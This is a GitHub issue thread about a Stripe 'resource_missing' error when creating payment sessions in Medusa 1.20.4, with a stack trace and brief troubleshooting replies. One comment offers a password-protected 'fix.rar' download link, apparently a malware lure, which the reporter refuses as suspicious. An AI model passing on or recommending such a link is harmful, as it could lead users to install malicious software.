### ISSUE TITLE
Stripe Payments not working

### ISSUE THREAD

**Issue by Hyd3r1** [medusajs/medusa#8823]
### Describe the bug

https://discordapp.com/channels/876835651130097704/1277696444366590084 - All is written here

```
::ffff:127.0.0.1 - - [26/Aug/2024:18:22:16 +0000] "GET /store/carts/cart_01J67VPQ9E64BK3JHEP3PYZB25 HTTP/1.1" 200 6191 "-" "node"
error:   An error occurred in updatePaymentData
Error: An error occurred in updatePaymentData
    at PaymentProviderService.throwFromPaymentProcessorError (C:\Users\conta\Desktop\GitHub\core-um\node_modules\.pnpm\@medusajs+medusa@1.20.4_@mikro-orm+core@5.9.7_@mikro-orm+migrations@5.9.7_@mikro-orm+postgres_odifv7rtxfcr57cvaur34eo7wy\node_modules\@medusajs\medusa\dist\services\payment-provider.js:1052:15)
    at PaymentProviderService.<anonymous> (C:\Users\conta\Desktop\GitHub\core-um\node_modules\.pnpm\@medusajs+medusa@1.20.4_@mikro-orm+core@5.9.7_@mikro-orm+migrations@5.9.7_@mikro-orm+postgres_odifv7rtxfcr57cvaur34eo7wy\node_modules\@medusajs\medusa\dist\services\payment-provider.js:638:50)
    at step (C:\Users\conta\Desktop\GitHub\core-um\node_modules\.pnpm\@medusajs+medusa@1.20.4_@mikro-orm+core@5.9.7_@mikro-orm+migrations@5.9.7_@mikro-orm+postgres_odifv7rtxfcr57cvaur34eo7wy\node_modules\@medusajs\medusa\dist\services\payment-provider.js:48:23)
    at Object.next (C:\Users\conta\Desktop\GitHub\core-um\node_modules\.pnpm\@medusajs+medusa@1.20.4_@mikro-orm+core@5.9.7_@mikro-orm+migrations@5.9.7_@mikro-orm+postgres_odifv7rtxfcr57cvaur34eo7wy\node_modules\@medusajs\medusa\dist\services\payment-provider.js:29:53)
    at fulfilled (C:\Users\conta\Desktop\GitHub\core-um\node_modules\.pnpm\@medusajs+medusa@1.20.4_@mikro-orm+core@5.9.7_@mikro-orm+migrations@5.9.7_@mikro-orm+postgres_odifv7rtxfcr57cvaur34eo7wy\node_modules\@medusajs\medusa\dist\services\payment-provider.js:20:58)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5) {
  type: 'invalid_data',
  code: 'resource_missing',
  date: 2024-08-26T18:22:32.200Z
}
```

And data object is empty

### System information

Medusa version (including plugins): 1.20.4, "medusa-payment-stripe": "^6.0.11",
Node.js version: 20
Database: postgre
Operating system: windows
Browser (if relevant):

### Steps to reproduce the behavior

1. Idk how to reproduce

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hyd3r1** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

Yeah... no i not download suspect files

**Comment by olivermrbl** [comment]
@Hyd3r1, what endpoint are you hitting that spawns this error?

**Comment by Hyd3r1** [comment]
payment-sessions post

**Comment by laxmikanta415** [comment]
@Hyd3r1 From the error i see it says `resource_missing` which can only happen when the resource with that ID is not there in stripe or deleted already before you created the request. You can see the details in stripe doc here: [https://docs.stripe.com/error-codes#resource-missing](https://docs.stripe.com/error-codes#resource-missing)

**Comment by Hyd3r1** [comment]
Yeah bcs stripe return 404 when medusa try search by internal session id
